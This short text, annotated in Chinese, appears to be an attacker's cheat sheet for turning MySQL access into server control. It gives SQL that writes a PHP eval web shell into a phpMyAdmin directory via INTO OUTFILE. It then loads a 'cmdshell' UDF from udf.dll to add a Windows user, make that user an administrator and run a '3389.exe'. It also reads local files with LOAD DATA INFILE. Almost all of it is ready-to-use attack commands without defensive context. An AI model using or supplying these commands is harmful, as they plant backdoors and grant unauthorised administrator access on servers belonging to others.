D:\usr\www\html\phpMyAdmin\
----start code---
Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php @eval($_POST[cmd])?>');
select cmd from a into outfile 'D:/usr/www/html/phpMyAdmin/d.php';
Drop TABLE IF EXISTS a;
----end code---
3:udf.dll提权
create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user user password /add');
select cmdshell('net localgroup administrators user /add');
select cmdshell('c:\3389.exe');
drop function cmdshell; 删除函数
select cmdshell('netstat -an');
load data infile "d:\\www\\gb\\about\\about.htm" into table tmp;
判断文件存不存在mysql的语句